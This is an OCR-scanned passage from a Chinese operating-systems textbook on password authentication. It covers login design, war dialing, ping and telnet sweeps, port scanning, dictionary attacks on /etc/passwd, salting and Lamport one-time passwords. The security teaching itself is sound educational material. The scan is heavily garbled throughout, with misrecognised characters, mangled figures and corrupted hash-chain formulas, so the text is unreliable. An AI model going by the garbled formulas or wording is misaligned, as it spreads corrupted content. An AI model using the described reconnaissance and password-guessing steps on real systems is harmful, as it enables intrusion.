定 当前 使 用 该 系统 的 用 户 的 身份 ， 则 系统 无 法 决定 哪些 文件 和 资源 是 该 用 户 可 以 访问 的 。 表 面 上 看 认证 
似乎 是 一 个 微不足道 的 话题 ， 但 它 远 比 大 多 数 人 想象 的 要 复杂 。 

用 户 认证 是 我 们 在 1.5.7 部 分 所 阐述 的 “个 体重 复 系统 发 育 ” 事 件 之 一 。 早 期 的 主机 ， 如 ENIAC 并 
没有 操作 系统 ， 更 不 用 说 去 登录 了 。 后 续 的 批 处 理 和 分 时 系统 通常 有 为 用 户 和 作业 的 认证 提供 登录 服务 
的 机 制 。 

早期 的 小 型 计算 机 (如 PDP-1 和 PDP-8) 没有 登录 过 程 ， 但 是 随 着 UNIX 操 作 系统 在 PDP-11 小 型 计 
算 机 上 的 广泛 使 用 ， 又 开始 使 用 登录 过 程 。 早 先 的 个 人 计算 机 (如 Apple II 和 最 初 的 IBM РС) 没有 登录 
过 程 ， 但 是 更 复杂 的 个 人 计算 机 操作 系统 ， 如 Linux 和 Windows Vista 需 要 安全 登录 (然而 有 些 用 户 却 将 
登录 过 程 去 除 ) 。 公 司 局 域 网 内 的 机 器 设置 了 不 能 被 跳 过 的 登录 过 程 。 今 天 很 多 人 都 直接 登录 到 远程 计 
算 机 上 ， 享 受 网 银 服务 、 网 上 购物 、 下 载 音 乐 ， 或 进行 其 他 商业 活动 。 所 有 这 些 都 要 求 以 登录 作为 认证 
身份 的 手段 ， 因 此 认证 再 一 次 成 为 与 安全 相关 的 重要 话题 。 

决定 如 何 认证 是 十 分 重要 的 ， 接 下 来 的 一 步 是 找到 一 种 好 方法 来 实现 它 。 当 人 们 试图 登录 系统 时 ， 
大 多 数 用 户 登录 的 方法 基于 下 列 三 个 方面 考虑 : 

D 用 户 已 知 的 信息 。 

2) 用 户 已 有 的 信息 。 

3) 用 户 是 谁 。 

有 些 时 候 为 了 达到 更 高 的 安全 性 ,需要 同时 满足 上 面 的 两 个 方面 。 这 些 方面 导致 了 不 同 的 认证 方案 ， 
它们 具有 不 同 的 复杂 性 和 安全 性 。 我 们 将 依次 论述 。 

那些 想 在 其 系统 上 若 麻 烦 的 人 首先 必须 登录 到 系统 上 , 这 决定 了 我 们 要 采用 哪 一 种 认证 方法 。 通常， 
我 们 把 这 些 人 叫做 “黑客 "。 但 是 ， 在 计算 机 界 ,“ 黑 客 ” 是 对 资深 程序 员 的 荣誉 称呼 。 他 们 中 也 许 有 一 
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些 是 欺诈 性 的 ， 但 大 多 数 人 并 不 是 。 我 们 在 这 方面 理解 错 了 。 考 虑 到 黑客 真正 的 含义 ， 我 们 应 该 恢复 他 
们 的 名 声 ， 并 把 那些 企图 非法 间 入 计算 机 系统 的 人 归结 到 驴 客 (Cracker) 一 类 。 通 常 “黑客 ”被 分 为 并 
不 从 事 违 法 活动 的 “ 白 情 子 黑客 ”和 从 事 破坏 活动 的 “ 黑 彤 子 黑客 "。 在 人 们 的 经 验 中 ， 绝 大 多 数 “ 黑 
客 ” 长 时 间 呆 在 室内 ， 而 且 并 不 戴 帽 子 ， 所 以 事实 上 很 难 通 过 他 们 的 帽子 来 区 分 “黑客 ”的 好 坏 。 


9.4.1 ”使 用 口令 认证 

最 广泛 使 用 的 认证 方式 是 要 求 用 户 输入 登录 名 和 口令 。 口 令 保护 很 容易 理解 ， 也 很 容易 实施 。 最 简 
单 的 实现 方法 是 保存 一 张 包 含 登 录 名 和 口令 的 列表 。 登 录 时 ， 通 过 查找 登录 名 ， 得 到 相应 的 口令 并 与 输 
入 的 口令 进行 比较 。 如 果 匹 配 ， 则 允许 登录 ， 如 果 不 匹 配 ， 登 录 被 拒绝 。 

毫 无 疑问 ， 在 输入 口令 时 ， 计 算 机 不 能 显示 被 输入 的 字符 以 防 在 终端 周围 的 好 事 之 徒 看 到 。 在 
Windows 系 统 中 ， 将 每 一 个 输入 的 口令 字符 显示 成 星 号 。 在 UNIX 系 统 中 ， 口 令 被 输入 时 没有 任何 显示 。 
这 两 种 认证 方法 是 不 同 的 。Windows 也 许 会 让 健忘 的 人 在 输入 口令 时 看 看 输 进 了 几 个 字符 ， 但 也 把 口令 
长 度 泄露 给 了 ” 偷 听 者 "。( 因 为 某 种 原因 ， 英 语 有 一 个 词汇 专门 表示 偷 听 的 意思 ， 而 不 是 表示 偷窥 ， 这 
里 不 是 叶 咕 的 意思 ， 这 个 词 在 这 里 不 适用 。) 从 安全 角度 来 说 ,沉默 是 金 。 

另 一 个 设计 不 当 的 方面 出 现 了 严重 的 安全 问题 ， 如 9-17 所 示 。 在 图 9-17a 中 显示 了 一 个 成 功 的 登录 
信息 ， 用 户 输 入 的 是 小 写字 母 ， 系 统 输 出 的 是 大 写字 母 。 在 图 9-17b 中 ， 显 示 了 骇 客 试图 登录 到 系统 A 中 
的 失败 信息 。 在 图 9-17c 中 ， 显 示 了 骇 客 试图 登录 到 系统 B 中 的 失败 信息 。 


LOGIN саго! 
LOGIN: mitch LOGIN: carol PASSWORD: ldunno 
PASSWORD: FooBart-7| INVALID LOGIN МАМЕ INVALID LOGIN 
SUCCESSFUL LOGIN LOGIN: LOGIN: 

a) b) ©) 


图 9-17 а) 一 个 成 功 的 登录 ，b) 输入 登录 名 后 被 拒绝 ，c) 输入 登录 名 和 口令 后 被 拒绝 


在 图 9-17b 中 ， 系 统 只 要 看 到 非法 的 登录 名 就 禁止 登录 。 这 样 做 是 一 个 错误 ， 因 为 系统 让 骇 客 有 机 
会 尝试 ， 直 到 找到 合法 的 登录 名 。 在 图 9-17c 中 ， 无 论 驴 客 输入 的 是 合法 还 是 非法 的 登录 名 ， 系 统 都 要 
求 输入 口令 并 没有 给 出 任何 反馈 。 骇 客 所 得 到 的 信息 只 是 登录 名 和 口令 的 组 合 是 错误 的 。 

大 多 数 笔记 本 电脑 在 用 户 登 录 的 时 候 要 求 一 个 用 户 名 和 密码 来 保护 数据 ， 以 防止 笔记 本 电脑 失窃 。 
然而 这 种 保护 在 有 些 时 候 却 收效 芙 微 ， 任 何 拿 到 笔记 本 的 人 都 可 以 在 计算 机 启动 后 迅速 敲 击 DEL、F8 或 
相关 按键 ， 并 在 受 保护 的 操作 系统 启动 前 进入 BIOS 配 置 程序 ， 在 这 里 计算 机 的 启动 顺序 可 以 被 改变 ， 
使 得 通过 USB 端 口 启动 的 检测 先 于 对 从 硬盘 启动 的 检测 。 计 算 机 持 有 者 此 时 插入 安装 有 完整 操作 系统 的 
USB 设 备 ， 计 算 机 便 会 从 USB 中 的 操作 系统 启动 ， 而 不 是 本 机 硬盘 上 的 操作 系统 启动 。 计 算 机 一 旦 启动 
起 来 ， 其 原 有 的 硬盘 则 被 挂 起 (在 UNIX 操 作 系统 中 ) 或 被 映射 为 D 盘 驱动 器 (在 Windows 中 )。 因 此 ， 
绝 大 多 数 BIOS 都 允许 用 户 设置 密码 以 控制 对 BIOS 配 置 程序 的 修改 ， 在 密码 的 保护 下 ， 只 有 计算 机 的 真 
正 拥有 者 才 可 以 修改 计算 机 启动 顺序 。 如 果 读 者 拥有 一 台 笔 记 本 电脑 ， 那 么 请 先 放 下 本 书 ， 先 为 BIOS 
设置 一 个 密码 。 

1. 骇 客 如 何 同 入 

大 多 数 骇 客 通过 远程 连接 到 目标 计算 机 (比如 通过 Internet)、 尝 试 多 次 登录 (登录 名 和 口令 ) 的 方 
法 找到 进入 系统 的 渠道 。 许 多 人 使 用 自己 的 名 字 或 名 字 的 某 种 形式 作为 登录 名 。 如 对 Ellen Апп Smith 来 
说 ,ellen、smith、ellen_smith、ellen-smith、ellen.smith、esmith、 easmith 等 都 可 能 成 为 备 选 登录 名 。 
黑客 凭借 一 本 叫做 《4096 Names for Your New Baby》4096 个 为 婴儿 准备 的 名 字 的 书 外 加 一 本 含有 大 量 
名 字 的 电话 本 ， 就 可 以 对 打算 攻击 的 国家 计算 机 系统 编辑 出 一 长 串 潜在 的 登录 名 (如 ellen_smith 可 能 是 
在 美国 或 英国 工作 的 人 ， 但 在 日 本 却 行 不 通 ) 。 

当然 ， 仅 仅 猜 出 登录 名 是 不 够 的 。 骇 客 还 需要 猜 出 登录 名 的 口令 。 这 有 多 难 呢 ? 简单 得 超过 你 的 想 
象 。 最 经 典 的 例子 是 Morris 和 Thompson (1979) 在 UNIX 系 统 上 所 做 的 安全 口令 尝试 。 他 们 编辑 了 一 长 
申 可 能 的 口令 ， 名 和 姓氏 、 路 名 、 城 市 各、 字典 里 中 等 长 度 的 单词 (也 包括 倒 过 来 拼写 的 )、 许 可 证 号 
码 和 许多 随机 组 成 的 字符 捉 。 然 后 他 们 把 这 一 名 单 同系 统 中 的 口令 文件 进行 比较 ， 看 看 有 多 少 被 猜 中 的 


364 #9} 


口令 。 结 果 有 86% 的 口令 出 现在 他 们 的 名 单 里 。Kiein (1990) 也 得 到 过 同样 类 似 的 结果 。 

也 许 有 人 认为 优秀 的 用 户 会 挑选 特别 的 口令 ， 实 际 上 许多 人 并 没有 这 么 做 。 一 份 1997 年 伦敦 金融 部 
门 关于 口令 的 调查 报告 显示 ，82% 的 口令 可 以 被 轻易 猜 出 。 通 常 被 用 户 采 用 的 口令 包括 : EE, E 
WR, AL (家庭 成 员 或 体育 明星 )、 度 假 地 和 办 公 室 常见 的 物体 (Kabay，1997)。 这 样 ， 骇 客 不 费 吹 
灰 之 力 就 可 以 编辑 出 一 系列 潜在 的 登录 名 和 口令 。 

网 络 的 普及 使 得 这 一 情况 更 加 恶化 。 很 多 用 户 并 不 只 拥有 一 个 密码 ， 然 而 由 于 记 住 多 个 元 长 的 密码 
是 一 件 困难 的 事情 ， 因 此 大 多 数 用 户 都 趋向 于 选择 简单 且 强 度 很 弱 的 密码 ， 并 且 在 多 个 网 站 中 重复 使 用 
他 们 (Florencio 和 Herley，2007，Gaw 和 Felten, 2006), 

如 果 口 令 很 容易 被 猜 出 ， 真 的 会 有 什么 影响 吗 ?当然 有 。1998 年 ,4 圣何塞 信使 新 闻 》 报 告 说 ， 一 
位 在 Berkeley 的 居民 Peter Shipley, 组装 了 好 几 台 未 被 使 用 的 计算 机 作为 军用 拨号 器 (war dialer), 拨打 
了 某 一 个 分 局 内 的 10 000 个 电话 号 码 [如 (415) 770-xxxx]。 这 些 号 码 是 被 随机 拨 出 的 ， 以 防 电话 公司 禁 
用 措施 和 跟踪 检测 。 在 拨打 了 大 约 260 万 个 电话 后 ， 他 定位 了 旧金山 湾 区 的 20 000 台 计算 机 ， 其 中 约 200 
台 没 有 任何 安全 防范 。 他 估计 一 个 别有用心 的 骇 客 可 以 破译 其 他 75% 的 计算 机 系统 (Denning, 1999), 
这 就 回 到 了 侏 罗 纪 时 代 ， 计 算 机 实际 只 需 拨 打 所 有 260 万 个 电话 号 码 。S 

并 不 只 有 加 利 福 尼 亚 州 才 有 这 样 的 骇 客 ， 一 个 澳大利亚 骇 客 曾经 做 过 同样 的 尝试 。 在 这 个 骇 客 间 入 
的 系统 中 有 在 沙特 阿拉 伯 的 花旗 银行 的 计算 机 ， 使 他 能 够 获得 信用 卡号 码 、 信 用 额度 (如 500 万 美元 ) 
和 交易 记录 。 他 的 一 个 同伴 也 曾 交 入 过 银行 计算 机 系统 ， 盗 取 了 4000 个 信用 卡号 (Denning，1999)。 如 
果 滥 用 这 样 的 信息 ， 银 行 毫 无 疑问 会 极力 否认 自己 有 错 ， 而 声称 一 定 是 客户 泄露 了 信息 。 

互联 网 是 上 帝 赐 给 骇 客 的 最 好 的 礼物 ， 它 帮助 骇 客 扫 清 了 入 侵 计 算 机 过 程 中 的 绝 大 多 数 麻烦 。 不 需要 
拨打 更 多 的 电话 号 码 ， 军 用 拨号 器 可 以 按 下 面 的 方式 工作 。 每 一 台 联 和 互联 网 的 计算 机 都 有 一 个 (32 位 的 ) 
IP 地 址 (IP Address)。 人 们 通常 把 这 些 地址 写成 十 进 制 点 符号 ， 如 wx.yz， 每 一 个 字母 代表 从 0 到 255 的 十 
进 制 IP 地 址 。 骇 客 可 以 非常 容易 地 测试 拥有 这 类 IP 地 址 的 计算 机 ， 并 通过 向 shel! 或 控制 台中 输入 命令 

ping w.x.y.z 
来 判断 该 计算 机 是 否 在 网 上 。 如 果 计 算 机 在 网 上 ， 它 将 发 出 回复 信息 并 告知 走 一 个 来 回 需要 多 少 毫秒 
(虽然 某 些 网 站 屏蔽 了 ping 命 令 以 防 攻击 ) 。 黑客 很 容易 写 一 个 程序 来 自动 发 射 大 量 的 IP 地 址 ， 当 然 也 可 
以 让 军用 拨号 器 来 做 。 如 果 某 台 计 算 机 被 发 现在 网 上 的 人 P 地 址 为 w.x.y.z， 骇 客 就 可 以 通过 输入 

telnet wx.y.z 
尝试 进入 系统 。 

如 果 联 机 尝试 被 允许 (也 可 能 被 拒绝 ， 因 为 不 是 所 有 的 系统 管理 员 欢 迎 通过 Internet 来 登录 ) ， BE 
就 能 够 开始 从 他 的 名 单 中 尝试 登录 名 和 口令 。 起 初 可 能 会 失败 ， 但 随 着 几 次 尝试 后 ， 驴 客 最 后 总 是 能 进 
人 系统 并 获取 口令 文件 (通常 位 于 UNIX 系 统 的 /etc/passwd 下 ， 而 且 对 公众 是 可 读 的 )。 然 后 ， 他 开始 收 
集 关于 登录 名 使 用 频率 等 统计 信息 来 优化 进一步 的 搜索 。 

许多 telnet (远程 登录 ) 后 台 程序 在 骇 客 尝试 了 许多 不 成 功 的 登录 后 会 暂停 潜在 的 TCP 连 接 ， 以 降 
低 骇 客 的 连接 速度 。 骇 客 这 时 会 同时 启动 若干 个 并 行 线程 ， 一 次 攻击 不 同 的 目标 。 他 们 的 目标 是 在 一 秒 
中 内 进行 尽 可 能 多 的 尝试， 利用 尽 可 能 多 的 带宽 。 从 他 们 的 观点 来 说 ， 同时 攻击 好 几 台 计算 机 并 不 是 一 
个 严重 的 缺陷 。 

除了 依次 ping 计 算 机 的 IP 地 址 外 ， 骇 客 还 可 以 攻击 公司 、 大 学 或 其 他 政府 性 组 织 等 月 标 ， 如 地 址 为 
foobar.edu 的 Foobar 大 学 。 骇 客 通过 输入 

dnsquery foobar.edu 


Ө 在 获得 奥斯卡 奖 的 科幻 电影 《 侏 罗 纪 公园 1》 中 ， 一 位 名 叫 Dennis Nedry 的 计算 机 系统 总 设计 师 瞳 地 里 将 由 
计算 机 控制 的 保安 系统 全 部 关闭 并 逃离 了 主 控 室 ， 以 便 窃取 并 带 走 恐 龙 的 DNA。 另 一 位 计算 机 技术 人 员 面 
对 混乱 的 系统 ， 对 现场 的 其 他 人 说 ， 由 于 没有 保存 任何 信息 所 以 要 想 恢复 保安 系统 ， 只 有 一 个 一 个 地 出 
试 ， 才 能 在 总 共 200 万 个 号 码 中 将 需要 的 号 码 找 出 来 ， 一 听 是 200 万 个 号 码 ， 在 场 的 人 泄 了 气 。 作 者 在 这 
里 调 偶 了 电影 《 侏 罗 纪 公园 T》 的 创作 者 们 ， 既 然 现场 计算 机 系统 还 能 工作 为 什么 不 让 计算 机 去 拨打 这 些 
号 码 呢 ! ? 译 者 注 
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就 可 以 查 到 该 大 学 的 一 长 串 卫 地 址 ， 也 可 以 使 用 nslookup 或 者 dig 程 序 (还 可 以 通过 向 机 器 中 键入 “DNS 
query” 来 从 网 络 中 查找 可 以 进行 免费 DNS 查询 的 网 站 ， 例 如 www.dnsstuff.com)。 因 为 许多 机 构 都 拥有 
65 536 个 连续 的 IP 地 址 (过 去 常用 的 一 整个 分 配音 元) ， 所 以 驴 客 一 旦 得 到 IP 地 址 的 前 2 个 字 节 
(dnsquery 命 令 的 结果 )， 就 可 以 连续 地 使 用 ping 命 令 来 看 一 看 哪些 地 址 有 回应 ， 并 且 可 以 接受 telnet 连 接 。 
完成 这 一 步 后 ， 骇 客 就 可 以 通过 我 们 前 面 所 介绍 的 猜 用 户 名 和 口令 的 方法 间 入 系统 。 

毫 无 疑问 ， 从 解析 主机 名 称 找到 1P 地 址 的 前 2 个 字 节 ， 到 ping 所 有 的 地 址 看 哪些 有 反应 ， 再 看 这 些 
地 址 是 否 支持 teinet 连 接 ， 到 最 后 大 量 地 进行 诸如 (登录 名 和 口令 ) 对 一 类 的 猜测 ， 这 些 过 程 都 可 以 很 
好 地 自动 完成 。 这 一 过 程 会 进行 大 量 的 尝试 ， 以 便 间 入 ， 而 且 如 果 骇 客 的 计算 机 性 能 稳定 的 话 ， 可 以 不 
上 断 地 重复 运行 某 些 命令 直到 进入 系统 。 一 个 拥有 高 速 电缆 或 DSL 连 接 的 骇 客 可 以 一 整 天 让 计算 机 自动 党 
试 进 入 某 个 系统 ， 而 他 所 做 的 只 是 偶尔 看 一 下 是 否 有 反馈 信息 。 

除了 远程 登录 服务 (telnet service) 以 外 ， 很 多 计算 机 还 提供 了 很 多 其 他 可 以 应 用 于 互联 网 的 服务 。 
每 个 服务 都 与 65 536 个 端口 (port) 中 的 一 个 相关 联 (attach) ， 当 驴 客 找到 了 一 个 活动 的 IP 地 址 ， 通 党 
情况 下 他 会 执行 端口 扫描 (port scan) 来 确定 每 个 端口 允许 哪些 服务 。 某 些 端口 可 能 会 提供 额外 的 服务 ， 
而 驴 客 则 可 能 利用 这 些 服务 侵入 系统 。 

使 用 telnet 攻 击 或 端口 扫描 很 明显 比 军用 拨号 器 要 快 (无 须 拨号 时 间 ) ， 而 且 成 本 低 (无 须 长 途 电话 
费 )。 但 它 仅 适用 于 攻击 Internet 上 的 计算 机 和 telnet 连 接 。 而 的 确 有 许多 公司 (包括 几乎 所 有 的 大 学 ) 都 
接受 telnet 连 接 ， 以 保证 雇员 在 出 差 时 或 在 不 同 的 办 公 室 (或 在 家 里 的 学 生 ) 进行 远程 登录 。 

不 仅 用 户口 令 如 此 脆弱 ， 而 且 超 级 用 户口 令 有 时 也 十 分 脆弱 。 特 别 是 有 些 刚刚 安装 好 的 服务 器 从 不 
更 改 出 厂 时 的 默认 口令 。 一 位 Berkeley 大 学 的 天 文学 家 Cliff Stoll 兽 经 观测 到 自己 计算 机 系统 的 不 正常 ， 
于 是 他 放置 了 一 个 陷阱 程序 来 捕 所 入 侵 者 (Stoll，1989)。 [CR 
他 观察 到 了 一 个 如 图 9-18 的 入 侵 过 程 一 一 某 个 骇 客 间 入 了 ELXSI AT LBL 
Lawrence Berkeley 实验 室 (LBL) 并 想 进入 下 一 个 目标 。 用 | LOGN mot 
于 网 上 交换 的 uucp (UNIX 到 UNIX 的 COPY 程 序 ) 账号 拥有 INCORRECT PASSWORD, TRY AGAIN 
超级 用 户 的 权力 ， 这 样 驴 客 可 以 问 入 系统 成 为 美国 能 源 部 计 | Буер ouest 
算 机 的 超级 用 户 。 幸 运 的 是 ，LBL 并 不 是 设计 核武 器 的 实验 INCORRECT PASSWORD, TRY AGAIN 
室 ， 而 它 在 Livermore 的 姐妹 实验 室 却 的 确 是 设计 核武 器 的 。 | к wo ,os 
人 们 希望 自己 的 计算 机 系统 更 加 安全 ， 但 当 另 一 家 设计 核武 |_WELCOME TO THE ELXSI COMPUTER AT LBL 
器 的 实 Los Alamos 丢 失 了 一 个 2000 年 机 密 信息 的 硬 
pe tt po И чела Нер нди 

一 旦 驴 客 问 入 了 系统 并 成 为 超级 用 户 ， 他 就 可 能 安装 一 LBL 实 验 宇 的 计算 机 的 
个 叫做 色 探 测 器 【packet sniffer) 的 软件 ， 该 软件 可 以 检查 所 有 在 网 上 进出 的 特定 信息 包 。 其 中 之 一 是 
查看 哪些 人 从 该 系统 上 远程 登录 到 别 的 计算 机 上 ， 特 别 是 作为 超级 用 户 登录 。 这 些 信息 可 以 被 驴 客 隐藏 
在 某 一 文件 下 以 便 闲暇 之 余 来 取 。 通 过 这 个 办 法 ， 骇 客 可 以 从 进入 一 个 安全 级 别 较 低 的 计算 机 人 入手 ， 不 
断 地 间 人 入 更 强 安全 性 能 的 系统 里 。 

目前 越 来 越 多 的 非法 入 侵 都 是 一 些 技术 上 的 生 手 造成 的 ， 他 们 不 过 是 运行 了 一 些 在 Internet 上 找到 
的 脚本 程序 。 这 些 脚本 要 么 使 用 我 们 上 面 介绍 的 极端 攻击 ， 要 么 试图 找到 特定 程序 的 bug。 真 正 的 骇 客 
认为 他 们 只 是 些 脚 本 爱好 者 (script kiddy), 

通常 脚本 爱好 者 没有 特定 的 攻击 目标 也 没有 特别 想 偷窃 的 信息 。 他 们 不 过 是 想 看 看 哪些 系统 较 容易 
间 和 罢了。 有 些 脚本 爱好 者 随便 找 一 个 网 络 攻击 ， 有 些 干脆 随机 选取 网 络 地 址 (1P 地 址 的 高 位 ) 看 看 哪 
些 有 反应 。 一 旦 获得 了 一 个 有 效 IP 地 址 的 数据 库 ， 就 可 以 依次 对 计算 机 进行 攻击 了 。 结 果 是 ， 一 台 全 新 
的 、 有 安全 保卫 的 军 方 计算 机 ， 刚 联网 数 小 时 后 就 受到 了 来 自 Internet 的 攻击 ， 其 至 除了 系统 管理 员外 还 
没有 多 少 人 知晓 这 台 机 器 。 

2.UNIX 口 今 安全 性 

有 些 (老式 的 ) 操作 系统 将 口令 文件 以 未 加 密 的 形式 存放 在 磁盘 里 ， 由 一 般 的 系统 保护 机 制 进行 保 
护 。 这 样 做 等 于 是 自 找 麻烦 ， 因 为 许多 人 都 可 以 访问 该 文件 。 系 统管 理 员 、 操 作 员 、 维 护 人 员 、 程 序 员 、 
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管理 人 员 甚至 有 些 秘书 都 可 以 轻而易举 得 到 。 

在 UNIX 系 统 里 有 一 个 较 好 的 做 法 。 当 用 户 登录 时 ， 登 录 程序 首先 询问 登录 名 和 口令 。 输 入 
被 即刻 “加 密 "， 这 是 通过 将 其 作为 密 钥 对 某 段 数据 加 窗 完成 的 : 运行 一 个 有 效 的 单 向 函数 ， 运 
口令 作为 和 输入， 运行 结 果 作为 和 输出。 这 一 过 程 并 不 是 真 的 加 密 ， 但 人 们 很 容易 把 它 叫 做 加 密 。 然 后 登录 
程序 读 和 加密 文 件 ， 也 就 是 一 系列 ASCII 代 码 行 ， 每 个 登录 用 户 一 行 ， 直 到 找 出 包含 登录 名 的 那 一 行 。 
如 果 这 行内 (被 加 密 后 的 ) 的 口令 与 刚刚 计算 出 来 的 输入 口令 匹配 ， 就 允许 登录 ， 否 则 就 拒绝 。 这 种 方 
法 的 最 大 好 处 是 任何 人 (其 至 是 超级 用 户 ) 都 无 法 查看 任何 用 户 的 口令 ， 因 为 口令 文件 并 不 是 以 未 加 窗 
方式 在 系统 中 任意 存放 的 。 

然而 ， 这 种 方法 也 可 能 遭 到 攻击 。 骇 客 可 以 首先 像 Morris 和 Thompson 一 样 建立 备 选 口令 的 字典 并 
在 空 暇 时 间 用 已 知 算法 加 密 。 这 一 过 程 无 论 有 多 长 都 无 所 谓 ， 因 为 它们 是 在 进入 系统 前 事先 完成 的 。 现 
在 有 了 口令 对 (原始 口令 和 经 过 了 加 密 的 口令 ) 就 可 以 展开 攻击 了 。 骇 客 读 入 口令 文件 (可 公开 获取 )， 
抽取 所 有 加 密 过 的 口令 ， 然 后 将 其 与 口令 字典 里 的 字符 串 进行 比较 。 每 成 功 一 次 就 获取 了 登录 名 和 未 加 
窗 过 的 口令 。 一 个 简单 的 shell 脚 本 可 以 自动 运行 上 述 操作 ， 这样 整 个 过 程 可 以 在 不 到 一 秒 的 时 间 内 完成 。 
这 样 的 脚本 一 次 运行 会 产生 数 十 个 口令 。 

Morris 和 Thompson 意 识 到 存在 这 种 攻击 的 可 能 性 ， 引 入 了 一 种 几乎 使 攻击 毫 无 效果 的 技巧 。 这 一 
技巧 是 将 每 一 个 口令 同一 个 叫做 “ 盐 ”(salt) 的 n 位 随机 数 相关 联 。 无 aa oa | 
论 何 时 只 要 口令 改变 ， 随 机 数 就 改变 。 随 机 数 以 未 加 密 的 方式 存放 在 |Tony, 2918, e(6%%TaFF, 2918) | 
口令 文件 中 ， 这 样 每 个 人 都 可 以 读 。 不 再 只 保存 加 密 过 的 口令 ， 而 是 Саша, 6902, e(Shakespeare, 6902) 
先 将 口令 和 随机 数 连接 起 来 然后 一 同 加 密 。 加 密 后 的 结果 存放 进口 令 Mark. 1694, о(хав #Bwcz,1694) 
文件 。 如 图 9-19 所 示 ， 一 个 口令 文件 里 有 5 个 用 户 :， Bobbie, Топу, 20011082. etordByron 1092) | 
Laura、Mark 和 Deborah。 每 一 个 用 户 在 文件 里 分 别 占 一 行 ， 用 逗号 分 ” 图 9-19 通过 salt 的 使 用 抵抗 对 
解 为 3 个 条 目 : 登录 名 、 盐 和 (口令 + 盐 ) 的 加 窗 结果 。 符 号 (Оов, 已 加 密 口令 的 先期 运算 
4238) 表示 将 Bobbie 的 口令 Dog 同 他 的 随机 ，4238 通 过 加 密 函数 e 运 算 
后 的 结果 。 这 一 加 密 值 放 在 Bobbie 条 目的 第 三 个 域 。 

现在 我 们 回顾 一 下 骇 客 非法 逆 入 计算 机 系统 的 整个 过 程 ， 首先 建立 可 能 的 口令 字典 ， 把 它们 加 窗 ， 
然后 存放 在 经 过 排序 的 文件 /中 ， 这 样 任何 加 密 过 的 口令 都 能 够 被 轻易 找到 。 假 设 入 侵 者 怀疑 Dog 是 一 个 
可 能 的 口令 ， 把 Dog 加 密 后 放 进 文件 / 中 就 不 再 有 效 了 。 骇 客 不 得 不 加 密 2" 个 字符 串 ， 如 Dog0000、 
Dog0001、Dog0002 等 ， 并 在 文件 / 中 输入 所 有 知道 的 字符 串 。 这 种 方法 增加 了 2" 倍 的 的 计算 量 。 在 
UNIX 系 统 中 的 该 方法 里 n= 12, 

对 附加 的 安全 功能 来 说 ， 有 些 UNIX 的 现代 版 使 口令 不 可 读 但 却 提供 了 一 个 程序 可 以 根据 申请 查询 
口令 条 目 ， 这 样 做 极 大 地 降低 了 任何 攻击 者 的 速度 。 对 口令 文件 采用 “加 盐 ” 的 方法 以 及 使 之 不 可 读 
(除非 间接 和 缓慢 地 读 ) ， 可 以 抵挡 大 多 数 的 外 部 攻击 。 

3. 一 次 性 口令 

很 多 管理 员 功 解 他 们 的 用 户 一 个 月 换 一 次 口令 。 但 用 户 常常 不 把 这 些 忠告 放 在 心 上 。 更 换 口令 更 极 
端的 方式 是 每 次 登录 换 一 次 口令 ， 即 使 用 一 次 性 口令 。 当 用 户 使 用 一 次 性 口令 时 ， 他 们 会 拿 出 含有 口令 
列表 的 本 子 。 用 户 每 一 次 登录 都 需要 使 用 列表 里 的 后 一 个 口令 。 如 果 入 侵 者 万 一 发 现 了 口令 ， 对 他 也 没 
有 任何 好 处 ， 因 为 下 一 次 登录 就 要 使 用 新 的 口令 。 惟 一 的 建议 是 用 户 必须 避免 丢失 口令 本 。 

实际 上 ， 使 用 Leslie Lamport 巧 妙 设计 的 机 制 ， 就 不 再 需要 口令 本 了 ， 该 机 制 让 用 户 在 并 不 安全 的 网 
络 上 使 用 一 次 性 口令 安全 登录 (Lamport,1981)。Lampor 的 方法 也 可 以 让 用 户 通过 家 里 的 PC 登录 到 Intemet 
服务 器 ， 即 便 入 侵 者 可 以 看 到 并 且 复 制 下 所 有 进出 的 消息 。 而 且 ， 这 种 方法 无 论 在 服务 器 和 还 是 用 户 PC 
的 文件 系统 中 ， 都 不 需要 放置 任何 秘密 信息 。 这 种 方法 有 时 候 被 称 为 单 向 散 列 链 (one-way hash chain), 

上 述 方法 的 算法 基于 单 向 函数 ， 即 y = f(x)。 给 定 x 我 们 很 容易 计算 出 y， 但 是 给 定 y 却 很 难 计算 出 x。 
输入 和 输入 必须 是 相同 的 长 度 ， 如 256 位 。 

用 户 选取 一 个 他 可 以 记 住 的 保密 口令 。 访 用 户 还 要 选择 一 个 整数 n+， 该 整数 确定 了 算法 所 能 够 生成 
的 一 次 性 口令 的 数量 。 如 果 ， 考 虑 ma = 4， 当 然 实际 上 所 使 用 的 n 值 要 大 得 多 。 如 果 保 密 口令 为 s， 那 么 通 
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过 单 向 函数 计算 n 次 得 到 的 口令 为 : 
P, =f AEE) 
第 2 个 口令 用 单 向 函数 运算 mn 一 1 次 : 
P =f EEO) 

第 3 个 口令 对 / 运算 2 次 ， 第 4 个 运算 1 次 。 总 之 ，P-, = 了 (P)。 要 注意 的 地 方 是 ， 给 定 任何 序列 里 的 口令 ， 
我 们 很 容易 计算 出 口令 序列 里 的 前 一 个 值 ， 但 却 不 可 能 计算 出 后 一 个 值 。 如 ， 给 定 P, 很 容易 计算 出 局， 
但 不 可 能 计算 出 P;。 

口令 服务 器 首先 由 Po 进行 初始 化 ， 即 /(P,)。 这 一 值 连同 登录 用 户 名 和 整数 1 被 存放 在 口令 文件 的 相 
应 条 目 里 。 整 数 1 表示 下 一 个 所 需 的 口令 是 P,。 当 用 户 第 一 次 登录 时 ， 他 首先 把 自己 的 登录 名 发 送 到 服 
务 器 ， 服 务 器 回复 口令 文件 里 的 整数 值 1。 用 户 机 器 在 本 地 对 所 输入 的 :进行 运算 得 到 P,。 随 后 服务 器 根 
据 P, 计 算出 / (P')， 并 将 结果 同 口令 文件 里 的 (Po) 进 行 比较 。 如 果 符 合 ， 登 录 被 多 许 。 这 时 ， 整 数 被 增加 
到 2， 在 口令 文件 中 书 覆 盖 了 Pu。 

下 一 次 登录 时 ， 服 务 器 把 整数 2 发 送 到 用 户 计算 机 ， 用 户 机 器 计算 出 P,。 然 后 服务 器 计算 KP;) 的 值 
并 将 其 与 口令 文件 中 存放 的 值 进行 比较 。 如 果 两 者 匹配 ， 就 允许 登录 。 这 时 整数 n 被 增加 到 3， 口 令 文 件 
中 由 户 覆 盖 P。 这 一 机 制 的 特性 保证 了 即使 人 侵 者 可 以 窃取 P 也 无 法 从 己 计 算出 忆 ，， 而 只 能 计算 出 PP |, 
但 P-, 已 经 使 用 过 ， 现 在 失效 了 。 当 所 有 个 口令 都 被 用 完 时 ， 服 务 器 会 重新 初始 化 一 个 密 钥 。 

4. 挑战 -响应 认证 

